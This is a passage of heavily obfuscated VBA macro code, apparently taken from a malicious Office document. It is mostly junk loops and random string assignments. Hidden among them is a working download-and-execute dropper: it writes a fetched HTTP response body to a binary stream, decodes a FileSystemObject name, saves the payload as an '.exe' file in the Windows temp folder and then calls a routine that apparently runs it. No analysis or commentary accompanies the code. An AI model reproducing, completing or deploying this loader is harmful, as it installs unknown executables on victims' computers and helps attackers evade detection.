    Next DcITvH

    xJmTr = UCase(")p^*QDm)JT#oC")
    For JDXjGV = 0 To 218
        dRJNzAWI = LTrim("NvsG(a]^ ?J&f")
        xJmTr = RTrim("QEUAleZ-krSe$vUtJ(Qh")
        uTUBY = 602 - 106 - 960
        DNcADa = Space(10)
        DNcADa = UCase("WDMp].a_&Z")
        dRJNzAWI = UCase("BmI[yKoWdlZMRq")
    Next JDXjGV

    dRJNzAWI = "ML[GM) wqzm" + "aYtvf?X)rPtLw" + "M^rpVVp$mX!"
        cBqKP.Type = 1
    While kinwve < 78
        NFtovv = Left("HBlAh_eWIDuY", 5)
        NFtovv = Left("yjIi e$%C*kSb$", 4)
        mNhsI = Left("xMarfe A)Jhg", 2)
        DNcADa = StrReverse("scCYFUy_cdO")
        dRJNzAWI = RTrim("AK-^n$F^U?)B#c[IVg")
        dRJNzAWI = RTrim("a?PPk#AtrqN^t")
        kinwve = kinwve + 1
    Wend

    mNhsI = Space(20)
    While vrcSeD < 209
        xJmTr = RTrim("dWKp$NrxDMGYAsF")
        xJmTr = Right("vU!d B.EzlvZbM", 4)
        xJmTr = Space(16)
        EhiXZPAc = UCase("ACz$t.gAnuxZxW.zYVPn")
        dRJNzAWI = Space(17)
        DNcADa = StrReverse("f(!] !fOOEP^RND")
        AZExHptj = Space(1)
        AZExHptj = StrReverse("LjabcJgxhT(")
        xJmTr = Space(11)
        uTUBY = StrReverse("S]O).T.X[&^jl)u")
        vrcSeD = vrcSeD + 1
    Wend

    dRJNzAWI = UCase("Aefr$B_K(MBc ]fuIJ.")
    For FVnUki = 0 To 124
        uTUBY = 1837 - 528 - 936
        xJmTr = 112 - 762 - 1709
        EhiXZPAc = LTrim("J)#qhej?[Sj^w")
        mNhsI = StrReverse("#Nsujt!qWq@W&Ojz")
        mNhsI = 396 + 1173 + 404
        EhiXZPAc = Right("mty@Cfs)aRXLI@Xj#YP", 4)
        xJmTr = "Dk&rBsKFRl" + "xKzU .gvPbZFzwL" + "cAGAWxJU (VphnctTP%"
        AZExHptj = 215 + 1451 + 957
        dRJNzAWI = Space(17)
        mNhsI = StrReverse("J#LbWid.@n.#S")
    Next FVnUki

        ToGXR = qoTdoQv.responseBody
    DNcADa = UCase(".-bCopQWmIwm_O")
    NFtovv = RTrim("EmUGkTdgIpJAG")
    NFtovv = RTrim("t_rbU@jOrkOVM!.I*")
    NFtovv = 428 + 1366 + 283
    xJmTr = Right("XUPu%q_Ysn", 5)
    xJmTr = RTrim("uPMp ROH WS^mxnUKsBH")
    While oCrtYA < 97
        AZExHptj = RTrim("&KCxNd!#&pUTo")
        NFtovv = "QoteFrdco?rv)" + "o)iT^L#X-S&wlw@Nrw." + "Uh^_)jLgmJjwy%"
        xJmTr = UCase("lVBcYBlV!e")
        oCrtYA = oCrtYA + 1
    Wend

        cBqKP.Write ToGXR
    xJmTr = Right("&]D?Tde&#Bc#y", 3)
    iarpkGY = StrReverse("lJTekO* xhRKJg]&MM")
    NFtovv = Left("@Snq)MtZBZO!xRz", 5)
    While zpMBQo < 60
        xJmTr = 888 - 877 - 1880
        mNhsI = Left("Y&P&SMnNyrrCG", 2)
        xJmTr = 1927 - 829 - 1130
        zpMBQo = zpMBQo + 2
    Wend

    DNcADa = Left("MmurjUtCwlhQx", 5)
    For zzGXhG = 0 To 231
        DNcADa = Space(10)
        xJmTr = RTrim("FoxDsaq.fBxbpp%hd@-J")
    Next zzGXhG

        Dim aBpXB As Object
    uTUBY = RTrim("!h #$ogzFUaN^aT?")
    While fXMkBC < 39
        iarpkGY = 1330 - 983 - 155
        AZExHptj = Right("TOx$JtjbGLW&jRG", 5)
        DNcADa = LTrim("m_y[My((biERP?QAfd")
        uTUBY = UCase(" qbxC-*Z* mzjJxh")
        uTUBY = Left("ouUpLHf-RE&Y&", 2)
        NFtovv = Left("ApdnC#jtosAxPe%(Rhv", 3)
        iarpkGY = 305 + 1068 + 1515
        xJmTr = 1486 + 479 + 153
        mNhsI = RTrim("?A!B V(gUY%&-np]h*Jm")
        DNcADa = UCase("$KiYSZhslun")
        fXMkBC = fXMkBC + 1
    Wend

    EhiXZPAc = Left("#fVkEwB-kE", 5)
    NFtovv = Left("o-Q?[tRoD.p", 2)
        Set aBpXB = CreateObject(wbYhCzxL("sxcDr^iUpNtBiPn$gX.Qf$islIe sIytstt_e?mFoPbQj-e&cutT"))
    For oIkzQt = 0 To 261
        NFtovv = "m* v??qPjCd l@" + "R*I^(WLY*R!p]K#u" + "aRnhc.I)_^ZfC"
        uTUBY = Right("xq$VHbJlrUTyE!_lDVK", 4)
        uTUBY = LTrim("?tvbKEKcM]&")
        dRJNzAWI = Right("QWI!E]d$bJJY#K]B@[j", 3)
        EhiXZPAc = "%xQbGe&tXIjxpLHCH." + "uOOiOqsge#" + "xsFeSlvYmUXYfK"
        mNhsI = RTrim("PcckR@!@vz*Z*vIvQ")
    Next oIkzQt

    For NgRTSa = 0 To 243
        EhiXZPAc = LTrim("eNLm!GUvmNvhG&XbjGr")
        AZExHptj = RTrim("WtszITI_gMbNU")
    Next NgRTSa

    While DBuPOY < 73
        iarpkGY = 909 - 1100 - 480
        uTUBY = StrReverse("()sZL_#bGca")
        dRJNzAWI = Space(5)
        mNhsI = Left("Pe**kC-iRTNF%uSOI@lx", 4)
        AZExHptj = LTrim("ftA!eET mQ*WW")
        mNhsI = RTrim("praz)p.]Hcd")
        NFtovv = RTrim("% %Iwwi.#Y^W)CK$R")
        DBuPOY = DBuPOY + 3
    Wend

    While FWATQF < 241
        dRJNzAWI = 1333 - 865 - 1668
        mNhsI = UCase("ZqOR*z?Fr^")
        FWATQF = FWATQF + 1
    Wend

    dRJNzAWI = Left("YPqz.-RFnz !", 5)
    uTUBY = Space(11)
    For hxJURt = 0 To 314
        mNhsI = Right(".ttzF_PZl)VkOV(GBSM]", 2)
        DNcADa = 567 - 1120 - 148
        NFtovv = 1860 - 1693 - 1133
        DNcADa = LTrim(".xq)qJyxWxWbar*?xD.!")
        dRJNzAWI = 1797 + 1695 + 1044
    Next hxJURt

        WlbMdcy = aBpXB.GetSpecialFolder(5 - 3)
    While qOsxkI < 335
        iarpkGY = Right("K@-uuaNoTt-l", 2)
        AZExHptj = Right("%yMB)!ePR[ivnk", 4)
        dRJNzAWI = 1215 + 1211 + 1305
        qOsxkI = qOsxkI + 2
    Wend

    For anmKfA = 0 To 130
        mNhsI = StrReverse("IEk_mzxHkLAetF")
        uTUBY = Space(16)
        mNhsI = StrReverse("(wv^d^xmM@uvFCpi")
        mNhsI = Left("@Y! tGtxB#y", 5)
        uTUBY = StrReverse("w*hUg@($b^ #fv@OufIj")
        AZExHptj = Left("dtVb)@RjiCrhrqQX", 5)
        DNcADa = StrReverse("*bld[IZERy*-vdBv")
    Next anmKfA

    While hGIpaF < 231
        mNhsI = Left("mU))cZTz H@zm]", 2)
        iarpkGY = UCase("UC N#sv]pAznu$$DeAY")
        hGIpaF = hGIpaF + 1
    Wend

    iarpkGY = Left("KRc.MzN&-##hxJYLn_g", 2)
    While gVlIzC < 98
        iarpkGY = "$ GXr[XenXdnYWf^I" + "Zp[ehe-nCs#XUyTWYwo" + "v.e*Fl^cmP e.."
        mNhsI = Right("KjZyL?esGQ.Y EQRa *", 2)
        gVlIzC = gVlIzC + 3
    Wend

    EhiXZPAc = 898 + 1780 + 1992
        Call cBqKP.SaveToFile(WlbMdcy & "\\" & wbYhCzxL("QKpLCEcMzxtbRs.aePxRe%"), 2)
    While mqrisu < 67
        AZExHptj = "P $rAqEcBhc" + "wQYaX[%Jayn]xozG[x" + "ZqrQVQkEeE@#DQej"
        AZExHptj = 1107 - 385 - 1300
        EhiXZPAc = Right("MErKtdBp.xyu", 4)
        NFtovv = Space(2)
        iarpkGY = LTrim("Up]PVamH?RIdo")
        xJmTr = 1001 - 822 - 1804
        EhiXZPAc = 526 + 1526 + 1094
        NFtovv = StrReverse("YhS_vGxLIQR ALg")
        mqrisu = mqrisu + 3
    Wend

    AZExHptj = Space(17)
    NFtovv = Space(2)
    For lDVjrI = 0 To 296
        EhiXZPAc = RTrim("J@s#PUMhewEY")
        NFtovv = Left("wwy?B()qRKt", 2)
    Next lDVjrI

    dRJNzAWI = Space(13)
        cBqKP.Close
    DNcADa = LTrim("_CdWM_tvx*na")
    iarpkGY = StrReverse("rOto[!xLt&LQ")
    AZExHptj = Space(11)
    For PvDFdn = 0 To 323
        mNhsI = 1041 + 550 + 1028
        DNcADa = LTrim("IkKLH^NA?GSO%%]Uld^y")
        NFtovv = StrReverse("&zBAFdjjjOoXvk^")
        mNhsI = LTrim("sDC_&tLv[JrER")
        AZExHptj = Right("yG[rlfLDjE-EMWORdHuJ", 3)
        AZExHptj = LTrim("TNyUdpJg-kWSZONY")
        xJmTr = 765 + 600 + 1381
        xJmTr = 1930 - 291 - 1967
    Next PvDFdn

    DNcADa = 872 - 540 - 1660
    End If
    While BorluV < 243
        NFtovv = "uD-mR?[c-MJon$N%ycZ#" + "sdB^TdRKzOs^R@%Z)jK" + "WhUTkkf#B.Ho"
        iarpkGY = "mP)UHv#Hlq_!caDRE" + "$-i&RhGxPpfVR" + "_Ur-DE]!q%Lw*I fY"
        xJmTr = LTrim(")yUXKTQ[Qnzm.qT")
        uTUBY = Right("&h#kiWl#*B.N&aD.kIG", 5)
        NFtovv = "[ihjNKaI..mP]" + "IW*KyAFvyWGsvRPo]J" + "wTvzJQeQeXJZKWPC TD"
        NFtovv = Left("#LBu[f@PGx_l?N)yX]c(", 4)
        NFtovv = Left("PggUHFkP#r& v", 3)
        AZExHptj = LTrim("U.SM)[TIfbUOioxWtl^G")
        xJmTr = 1346 + 988 + 490
        BorluV = BorluV + 2
    Wend

    EhiXZPAc = "#!CTjllVKTAMmq" + "sAws%vC?CE" + "G- hQEbAmk[#!wIC"
    NFtovv = Space(16)
    For iBhpSx = 0 To 325
        EhiXZPAc = 760 + 1472 + 173
        mNhsI = UCase("nvNvUmrtIUvdeZ ")
        mNhsI = RTrim("RUGOnw_OjAIXc&#")
        xJmTr = 217 + 1676 + 691
        dRJNzAWI = StrReverse("FcwOL#s?j$cL.wv")
        xJmTr = 179 - 1292 - 330
        DNcADa = UCase("wk.!m&#J?yL^VT")
    Next iBhpSx

    DNcADa = 594 + 1729 + 1441
    EhiXZPAc = "[%ANr_Ma&^r[_w-" + "C[SH-nTE*LdIaN" + "?tlBWaRny^YLqg)"

    DNcADa = RTrim("rDHB.gkFgZuzmHU^q")
    While OLiWNC < 342
        DNcADa = Space(1)
        mNhsI = 1639 + 959 + 1557
        mNhsI = 1033 - 1538 - 1014
        iarpkGY = "w-zLZrc-KPs$AFp" + "*ij.hY@ov_N" + "ZNeXvWcVdyN"
        mNhsI = Left("d?J@#sXizr&ACUiC]Kj", 4)
        uTUBY = 1484 + 1843 + 1530
        NFtovv = RTrim("SsQWr].@HC^Lh@Cj")
        DNcADa = UCase("*)tqja]OzeY*eU#L#M.")
        DNcADa = RTrim("BeUFSnxxzaMAjsUFw[")
        xJmTr = LTrim("ozv_h-xWKssdDDW")
        OLiWNC = OLiWNC + 3
    Wend

    DNcADa = UCase("]IuAbuK-A(tI")
    NFtovv = "UTTnM*DL]PMh" + "u%v$y.sCI%gRdVqX](" + "x@Z(_*)@R@.Q#RLc&Q"

    While ufSjh < 543
        iarpkGY = StrReverse("#uihs?IUcC^")
        dRJNzAWI = UCase("q_WZ^t-Ds.^Fw) ORqOd")
        mNhsI = 136 - 1426 - 256
        AZExHptj = LTrim("jVkZ)wk ut$J@c(Cd")
        uTUBY = Left("azkgUhTuq@YcIkGI", 4)
        While hYpeWo < 366
            dRJNzAWI = LTrim("zj(l^l@ar*JOG")
            EhiXZPAc = Left("^aM#!kuLvBtwMquBL$y", 4)
            iarpkGY = LTrim("NHqn*k.iY^UZ?")
            EhiXZPAc = LTrim("!evz@PBAtxYA")
            mNhsI = Space(11)
            hYpeWo = hYpeWo + 2
        Wend

        uTUBY = Right("EGhgfvkhXcgFlfW", 5)
        iarpkGY = RTrim("u.$.$vtYCKG")
        uTUBY = LTrim("TFLPGleqHLN")
        If ufSjh = 261 Then
            AZExHptj = UCase("TZ!AgXI-zUV")
            EhiXZPAc = Left(")WYS-GEYjnbKqEqh", 4)
            EhiXZPAc = 659 + 1088 + 1723
            AZExHptj = 1703 - 1319 - 924
            uTUBY = StrReverse("*ha.])GiZ#))")
            For SADeGO = 0 To 251
                DNcADa = Space(6)
                NFtovv = Left(" oZTOE_IeN", 5)
                xJmTr = StrReverse("wRzGq(UTHIKrxQeT")
                xJmTr = UCase("[#)vc@_sWGDh_EMpUViw")
                mNhsI = 1577 - 1929 - 1098
                dRJNzAWI = 704 + 752 + 1033
                uTUBY = "!HPMBw!)blg(t#bkuqD" + "Bzv %_nf(HVu_-SG" + "c#gjc SxvWrc"
                uTUBY = "[xS(smPGJAXMC[EOd" + ".#cGDEXG]]__e[q" + "aQeCO(*CQZht"
                EhiXZPAc = Right("AByadlTBSwQku)", 5)
            Next SADeGO

            AZExHptj = 202 - 138 - 452
            Call hWvspyZ(LZfVAJ & "\\" & wbYhCzxL(aUArWp), "gEWI", "hmDWRZLl", "EczAVtE")
        End If
        EhiXZPAc = 1215 + 1910 + 1415
        AZExHptj = UCase("yiFxTpF!E!")
        DNcADa = 944 - 380 - 1155
        EhiXZPAc = LTrim("ExvVljjY_(yt")
        DNcADa = "PxMXKecWITxn[" + "Z.)))JQQtaCOf?ACW" + "SjfJKV -ZQwbmBT"
        While JBZqrY < 139
            DNcADa = RTrim("qrhyv*iHzNSS@[hfvM.")
            DNcADa = UCase("$mM)Dbn*ys%BSKy-Fn[")
            EhiXZPAc = UCase("*VgMfv(ffimSoSEnNtcN")
            xJmTr = 1442 + 729 + 165
            JBZqrY = JBZqrY + 2
        Wend

        EhiXZPAc = RTrim("zHgaZnXIwgPCTeJ@ q@!")

    ufSjh = ufSjh + 1
    Wend
    NFtovv = 1748 - 1337 - 589
    AZExHptj = Space(1)
    dRJNzAWI = UCase("#*yXPnx_tl#_U%F?q")
    mNhsI = LTrim("DoFoU(moMfL%GeU*U")
    mNhsI = 942 + 964 + 1587
    uTUBY = 1963 - 635 - 983
    xJmTr = UCase("aj(M%vMbZQ")
    EhiXZPAc = 1948 - 964 - 1233
    For MgBbXY = 0 To 212
        dRJNzAWI = "gnQ%vs*?CT*st" + "G_ja[jC$LP?AgVve" + "Qwlig]pzf!a#%puGI"
        xJmTr = RTrim("YH]Qt%aB$*")
    Next MgBbXY

    EhiXZPAc = 441 + 1790 + 456
    DNcADa = RTrim("rV_H^Hr sXt$QR")
    uTUBY = StrReverse("!Lr@jOKgHs]QW%&&k]T")

End Sub

Private Sub irkwmX(qpiigsa As Double, eINiGke As String, UpVzCc As String)
    AZExHptj = 1493 + 1007 + 1469
    xJmTr = "c**^NsRwU#Xa.HM" + " kz?MBEvZNSo!" + "xN&dDrNqFiMzFxcDq*"
    xJmTr = 707 - 1790 - 318
    dRJNzAWI = RTrim("e@PDFz&uFuFUcpIpabrJ")
    iarpkGY = RTrim("PAkSwu%nDGfhoQvLyjtJ")
    iarpkGY = RTrim("wRrI]GKgx*AT]G]Ep)")
    uTUBY = 783 - 753 - 1101
    EhiXZPAc = 209 - 594 - 875
    mNhsI = Left("YpqCtXLeB$? oNkr$X", 4)
    mNhsI = UCase("R%?_r*(r&MoTr")
    NFtovv = UCase("p? Sg O oE")
    uTUBY = LTrim("!wJC^DqTZp^iOY*Uh@")
    mNhsI = 258 + 1619 + 326
    iarpkGY = Space(5)
    DNcADa = Space(7)
    dRJNzAWI = Right("(qVQAJ(silxOY&)lb", 5)
    iarpkGY = 704 + 1411 + 597
    mNhsI = Right("df-%_OPVz.mmCFte", 5)
    AZExHptj = 995 + 1735 + 1122
    uTUBY = StrReverse("q_EBP&qEGN *Hhg?")
    EhiXZPAc = Left("WqWn!sx^JB(Qu@r.*", 2)
End Sub

Private Function snByuc(khADyHq As Double, HRWoQwD As String, gKnwMF As String) As String
    EhiXZPAc = UCase("m-MyiX.)bj")
    EhiXZPAc = Left("ZVH]Y Xb#vG##", 3)
    mNhsI = UCase("zfNh*)hznn[j")
    EhiXZPAc = "q!.nRx@zV$hB]#^" + "?hCJKLtzuVUNEYQCko" + "-ahIiTSfN)Rv"
    AZExHptj = "yHqvVLTM#USvRF]*" + "GJgO#PJhj.o" + "&qcRd$b$]%y?H.MECP"
    dRJNzAWI = RTrim("wJGYtqZbm [y(yu")
    AZExHptj = UCase("Oinz-kCYp#IN[a")
    dRJNzAWI = "O-(QHeqQgHvul*&DUSmg" + "S!q]V-_((][yom(J-" + " IMD&&?qlvR(u"
    dRJNzAWI = "ydXZWcXhxz" + "RkAAMA%koK&Q$#?p" + "bpM%T[rp[bre(h"
    While RiBTZb < 86
        NFtovv = Right("iJYt-u)s[&)", 3)
        EhiXZPAc = RTrim("jwo(qnh-t(o Q$oZcmb")
        EhiXZPAc = StrReverse("&mYZ$dX&Wz!$kryx")
        mNhsI = RTrim("]CH[RHi@I#XIUK!v")
        RiBTZb = RiBTZb + 2
    Wend

    dRJNzAWI = StrReverse("m TBI %*#gEnhiqo")
    xJmTr = LTrim(" PFi^gJt[M(E ")
    NFtovv = RTrim("Eq $bhj#BN-)-ERop")
    xJmTr = UCase("QeaSyWtB(mH_(Q$)yLon")
    mNhsI = 1801 - 464 - 959
    dRJNzAWI = UCase("JKmHuZLxCm%Am")
    iarpkGY = Right("jNom^nqtuK(_", 5)
    EhiXZPAc = RTrim("]SMlyNx o[b")
    uTUBY = Right("]AH[XLy[vP[E&l$V", 3)
    AZExHptj = LTrim("pmfgyoe-XC")
    DNcADa = LTrim("C%gTOlKw kH")
    dRJNzAWI = Right("I Ng epQBBVm%b?z", 3)
    NFtovv = 1609 - 201 - 405
    snByuc = "qzHIehHnDPewnPQvpZaRZtD"
End Function

Private Sub scdhrU(rowcJhU As String, kjoVIix As Double, OWRkud As String)
    EhiXZPAc = Right("Nw)Dp[#%Yh", 5)
    uTUBY = 777 - 1856 - 783
    dRJNzAWI = ")SyoBf*Dxm%Lwv" + "fUSVk[M!jQ]zPO r" + "OIidqr)NZ**pB.Y"
    AZExHptj = "NVySR[q(?Y&[J " + "b&iN*d nrd LdOI$" + "KDXG-AXfE%N"
    DNcADa = 325 - 1295 - 1652
    iarpkGY = LTrim("vinH?N_erq")
    EhiXZPAc = UCase("Y$oNXa Y#hn&QaKtH")
    xJmTr = 329 + 730 + 892
    For gtmUFl = 0 To 355
        EhiXZPAc = RTrim("Hw-lHr#cK?FuE")
        NFtovv = StrReverse("tvpL!agU$GlbpxT")
        mNhsI = 1133 + 1640 + 1148
        xJmTr = Left("WwSpRdVF*Sgc!$meS]( ", 5)
        xJmTr = StrReverse("-gBwvsBVDf")
        mNhsI = UCase("AE TZ!ZRcAscZEgy?f j")
        mNhsI = StrReverse("*?VX$Hn?SjJ.Dww]]]")
    Next gtmUFl

    NFtovv = RTrim("CpcCTjDmw^bLSRBpJ")
    uTUBY = Right("noK$WuqHk^f@J#xRq", 2)
    DNcADa = UCase("_&K.k_f%iK%gJH")
    xJmTr = "AP!*uqO#o$C?P$" + "zRGT S(VgnD%O" + "]Rnllx##$LApms!u[j"
    While JRzpSF < 153
        DNcADa = StrReverse("Qpppl]qC[hwvN")
        xJmTr = 1565 - 1498 - 1988
        JRzpSF = JRzpSF + 2
    Wend

    For PtJupB = 0 To 149
        xJmTr = Left("IJjvF?KYTX", 4)
        NFtovv = 384 - 478 - 992
        NFtovv = 1692 + 1509 + 1684
        uTUBY = Space(11)
        uTUBY = "uT a&p dfqpqP" + "PbyzVDZ*)*" + "Yz$[cl$wgitrQJ.-q["
        AZExHptj = Space(19)
    Next PtJupB

    uTUBY = Right("yL_!Yq&kwUWO", 3)
    uTUBY = 130 - 768 - 539
    uTUBY = Right("AUQa*x)vWf aEonxfJ", 5)
    EhiXZPAc = Left("&&dSn$^UaK^", 3)
    EhiXZPAc = UCase("bK#J)ge.ASEglY@Vd")
    DNcADa = UCase("m-B?t#]#$b")
    DNcADa = Right("* st[%Otu]wC ", 3)
    NFtovv = RTrim("YPFfj*syY!.)Q!U")
    EhiXZPAc = Space(16)
End Sub

Private Sub tPKRsM(QJViwnv As Double, odzFzQP As Double, JNXnsqg As Boolean)
    NFtovv = LTrim("JUzUqJRUK&ycG!mY")
    NFtovv = 1030 - 821 - 1713
    uTUBY = Space(19)
    DNcADa = "xBuReG!x]I!@LW$S_ZoI" + "^tItTsVzO*]" + " .POuA%^k)v#qEFUZ"
    xJmTr = StrReverse("biohDUPGQ%yTVD")
    NFtovv = Left("QJ.Qo$B@lDHD)T", 4)
    EhiXZPAc = LTrim("YMUCUqJ(.G")
    xJmTr = "FY_#BJ)pt^y-q[uB(I" + "Dvt%(RTZkHri[*oIl" + "aMEfcAivan[fH&"
    xJmTr = Left("[EXsTTnJfF^(GS@[ZTb", 5)
    DNcADa = 1638 + 1353 + 1053
    DNcADa = StrReverse("g[NAPWc)Pw lWN^RDt(")
    mNhsI = Right("@l_dkImb!s@", 3)
    NFtovv = ".Nr.SQMI#[y@Y@O" + "aT&EsGQKz@mMYLET" + " *dCLdan]RwXzO*G"
    For ouqvQf = 0 To 121
        uTUBY = UCase("jd(a]^nlnX")
        uTUBY = LTrim("hrU%H*wfX(pOLmW-j")
        EhiXZPAc = RTrim("l$wbD@Nc#&! xDZ")
        uTUBY = "chrUZRj@%c&tauzC$Xw" + "uM %-^aSYfOQwu&" + "BlEh]zZg-o"
        AZExHptj = LTrim("KY_rjX& @UZkRsbRCf")
        NFtovv = Space(16)
        DNcADa = Left("IbMkX(Z%l)n&ZF?SS", 3)
        xJmTr = 270 + 421 + 1626
        iarpkGY = Space(3)
    Next ouqvQf

    mNhsI = Left("cQ!IGJfHd%l!$Hx&ZN?", 2)
    xJmTr = Left("h-O*?kbVM^t VNH]P)Bv", 3)
    NFtovv = Space(19)
    xJmTr = "tUrumy**lPlj -h" + "[t-GNZ#IOJ*?EX" + "Gn%wr[Sme]zNTHNO"
    uTUBY = 1137 + 842 + 1878
    While anEAnU < 337
        NFtovv = UCase("KAgbrZ[BXLHT?")
        NFtovv = UCase("OZizC vxFLp&H?")
        uTUBY = RTrim("CgDha&xXfwcyCWv")
        mNhsI = 1575 - 619 - 688
        dRJNzAWI = UCase("?zHVI[WkcjIik")
        mNhsI = StrReverse("Tz UhE-_nOx UZUebV.")
        anEAnU = anEAnU + 2
    Wend

    For KtEqip = 0 To 342
        iarpkGY = 459 + 1244 + 1849
        mNhsI = UCase("X$@wJF?fPm]eU^Lul")
        uTUBY = UCase("DMpiHo?QA)iC?")
        NFtovv = Space(20)
        AZExHptj = RTrim("YB@VsWrIvI#")
        dRJNzAWI = 940 - 1137 - 1565
    Next KtEqip

    AZExHptj = StrReverse("W_J!)v_W?&UX!OEQ&wW")
    DNcADa = Left("#tl)sa&h^AqhL", 3)
    DNcADa = Space(9)
    mNhsI = RTrim("$rL^-Mylu#GnWP^ER&")
    iarpkGY = "Sk%ZCW_vTU" + "ju UjU!*IVa)cabLT" + "pt$bB?QIa.X@"
    iarpkGY = 1434 + 667 + 262
    dRJNzAWI = Space(11)
    AZExHptj = StrReverse("J)hxkHj_dyoJX*M@_[")
    For NRFDIn = 0 To 375
        dRJNzAWI = UCase("OZQdbk%V]vdaH.p")
        xJmTr = UCase("^Lzxvg)HIId")
        iarpkGY = RTrim("cviz]U*UmV&[PCAflmEv")
        NFtovv = Left("SEcaootAMnYu)pp ", 3)
        xJmTr = Space(13)
        uTUBY = UCase("rMXQnpkCNnq.I")
        dRJNzAWI = StrReverse("dhBY*KTctOCnz!tvhD")
        uTUBY = "OSUCiuz_JKlZxU" + "HJ&LCBvAK%BXP" + "b*L&hx^#_nxu@tLc"
    Next NRFDIn

    EhiXZPAc = 1115 - 1038 - 1573
    uTUBY = LTrim("In_dL&nr*CvRr$E")
    xJmTr = UCase("E(@F_)&bgdB)qmiE*Nq")
    uTUBY = Right("r@Nf_yKSm$w-@g(", 5)
End Sub

Private Sub CbdOrO(oGlRkyk As Double, pMkSfEy As String, nZECrVs As Double, EhtTghd As Boolean, weIbBTk As String)
    DNcADa = "ZLzkJ(]Kva  j&Exfva" + "[dz*M&PJqXv" + "hi^nwrpFyAC"
    iarpkGY = 706 + 181 + 1395
    iarpkGY = RTrim("H?HBRK[NClzWi@T")
    EhiXZPAc = 650 + 1304 + 1549
    xJmTr = Left("Z zBpGImLyr", 3)
    EhiXZPAc = RTrim("wlQdl&.#Lk")
    uTUBY = Space(2)
    uTUBY = Right("U_*lWUnsVwbL%qT", 2)
    While MdbZXi < 144
        iarpkGY = "fxZv fwr%.%TfTfl" + "cQIJ*^]*Jiy" + "dUF^I.QFoX&?BDr)(M"
        DNcADa = Space(3)
        NFtovv = Space(15)
        DNcADa = LTrim("qu&-a!CPbI^.R_zpo")
        uTUBY = LTrim("Pdm!!UaPiV@(Gt@")
        EhiXZPAc = Right("dFa@vXd!dtvb_lrVb#", 3)
        MdbZXi = MdbZXi + 1
    Wend

    mNhsI = 1702 + 741 + 1300
    dRJNzAWI = StrReverse("sr]csufaVfczXlzbibBf")
    mNhsI = 809 - 1798 - 884
    mNhsI = Left("do%tL YgOV", 5)
    dRJNzAWI = 107 + 1349 + 1617
    For MENUZz = 0 To 394
        dRJNzAWI = "a]u[u-LZ]TK" + "Uwpwvo)dRW" + "_plyQlyuMjj&x"
        EhiXZPAc = Right("QZN[RLRSEXT]CRL**@", 4)
        iarpkGY = Space(14)
        NFtovv = 1909 - 1313 - 1829
        mNhsI = StrReverse("wLB@gAR&F-AM_pW-cA_Y")
        AZExHptj = Left("QeQn da$-DuNVZ@Bh#d", 5)
    Next MENUZz

    DNcADa = LTrim("a!$n]WLZLUd#")
    dRJNzAWI = "..)hjebEH-(^O.O(Rj&x" + "lJIPplxWdSUq" + "dIi_&Eq_jKTAA&?Y#elz"
    iarpkGY = Right("N*TS#oAlrp@", 5)
    uTUBY = StrReverse("AiiBxwjYAWQH")
    EhiXZPAc = Right("tJRBC@eM (xHn", 2)
    uTUBY = Left("_[nne*?-^ ", 5)
End Sub

Private Function iGsKKr(tSSalLZ As Integer, nNuvnQu As Double) As String
    DNcADa = RTrim("Wm#fVYc?[?jy")
    mNhsI = UCase("fi &o*!?dk")
    NFtovv = RTrim("mp?SFRiS.skDQZf-%LO")
    mNhsI = Right("c].ViJp^eBlWt(DgEDl$", 2)
    iarpkGY = Space(9)
    mNhsI = UCase("QT$y#q%@u]JPnHE")
    While bEfrYd < 198
        AZExHptj = RTrim("dZDtPtbJ#_K)]")
        dRJNzAWI = LTrim("dd$(gOE[[DrCxoFbPrw")
        DNcADa = Space(8)
        dRJNzAWI = 581 + 1385 + 870
        DNcADa = 792 + 1033 + 1633
        xJmTr = Space(18)
        uTUBY = 1492 - 851 - 320
        uTUBY = RTrim("RFm&$l)c!$#HaCLwl")
        AZExHptj = 546 - 1486 - 252
        uTUBY = 1649 - 980 - 891
        bEfrYd = bEfrYd + 1
    Wend

    NFtovv = Space(10)
    EhiXZPAc = StrReverse("@zw%r_@u.KBe%$&?")
    mNhsI = UCase("ucTlWv%UAm)RGi")
    EhiXZPAc = Space(1)
    DNcADa = 1300 + 627 + 495
    While sjoDlE < 358
        EhiXZPAc = 1980 - 1842 - 1073
        uTUBY = 908 + 1498 + 1871
        NFtovv = StrReverse("yqmrJofJgmY")
        xJmTr = 1909 + 1676 + 238
        iarpkGY = UCase("qYEfQg_KizITQD^wX[rm")
        sjoDlE = sjoDlE + 3
    Wend

    uTUBY = 1566 + 1129 + 375
    iarpkGY = 1712 - 1532 - 1158
    DNcADa = RTrim("t[S^GloisrSQlSZvrPsm")
    DNcADa = Right("TL$!t)xuxJ$kLnc", 2)
    DNcADa = 1932 + 1356 + 1064
    For krqrmf = 0 To 225
        dRJNzAWI = LTrim("S)wIVWlnhV[nds")
        EhiXZPAc = UCase("#unyw!A(ZU..Ludo.")
        DNcADa = 1110 + 406 + 1765
        xJmTr = Right(".-TfXK!.cSuO", 5)
        iarpkGY = UCase("UNrNnLjKW[]")
        EhiXZPAc = Space(18)
    Next krqrmf

    For GLUknx = 0 To 151
        iarpkGY = Space(5)
        uTUBY = "A-mF]&HuQ[_H- )wYL%" + "A?K Lggmn]P" + "Cmk-lh*O#M[KPg?"
        AZExHptj = Space(13)
    Next GLUknx

    EhiXZPAc = RTrim("xrHkrDSjJWyTkTqLA")
    xJmTr = StrReverse("aF^*TNNnM#MJCGfV.aJR")
    While leTSYP < 43
        EhiXZPAc = 200 - 1761 - 773
        EhiXZPAc = UCase("LqImgHQiDVsoam&JC")
        EhiXZPAc = 1504 - 1892 - 1668
        iarpkGY = Space(1)
        leTSYP = leTSYP + 3
    Wend

    NFtovv = Left("#y*dSt&gW)nhtSL", 2)
    iGsKKr = "UJpwlrsIeYwIkolddvAeZKyZ"
End Function

Public Function wbYhCzxL(UtZamgv As String) As String
mNhsI = Right("p(A@Kh%N@lv", 3)
dRJNzAWI = UCase("K&RLcEQ]t[_W!Qk@j(e#")
    Dim VxnsPg() As Byte
    For FFPIZD = 0 To 204
        DNcADa = StrReverse("i-#yvT$ pzRc tPEnD")
        NFtovv = 771 - 329 - 1198
        uTUBY = "%YhUM*$.dK" + "nv*GEKt%LAZtkI_" + "k(UbkwRK_aYYVw)L$k"
        iarpkGY = RTrim("sVKTGfr)qjigR%maL*Lg")
    Next FFPIZD
    NFtovv = Left("w%.egkzIH%E", 2)
    AZExHptj = RTrim("TK#BQNHlWa[nw@X[X#Sc")
    AZExHptj = UCase("k?myFjIu@Zz#")
    Dim svdXq(1000) As Byte
    mNhsI = UCase("!MDgtCUcks!UeNHQc-")
    dRJNzAWI = Right("#VebBq#_w&)mm", 4)
